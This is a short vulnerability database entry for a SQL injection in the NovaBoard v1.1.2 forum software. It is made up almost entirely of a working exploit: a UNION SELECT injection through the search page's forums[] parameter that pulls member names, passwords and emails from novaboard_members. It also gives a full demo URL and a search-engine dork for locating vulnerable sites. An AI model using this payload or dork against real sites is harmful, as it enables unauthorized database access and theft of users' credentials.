NovaBoard v1.1.2 SQL Injection Vulnerability

2010-01-29T00:00:00
ID SSV:19021
Type seebug
Reporter Root
Modified 2010-01-29T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #############################################################
# NovaBoard v1.1.2 SQL Injection Vulnerability
   
# Plugin Home: http://www.novaboard.net/
   
# Author: Delibey
   
# Site: www.1923turk.com
  
##############################################################
   
   
# Download   Script  : http://novaboard.googlecode.com/files/NovaBoard1.1.2.zip
                                     
   
    
# Exploit: index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=[SQL-inj]
   
   
#  1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
              
#  Dork  : "Powered by NovaBoard v1.1.2"          
   
# Demo: http://server/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[1923Turk]=1)+union+select+1,2,3,4,concat_ws(0x0A,name,password,email),6,7,8,9+from+novaboard_members+--+
   
    
##############################################################
# Greetz: Manas58 - Baybora - Gamoscu - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################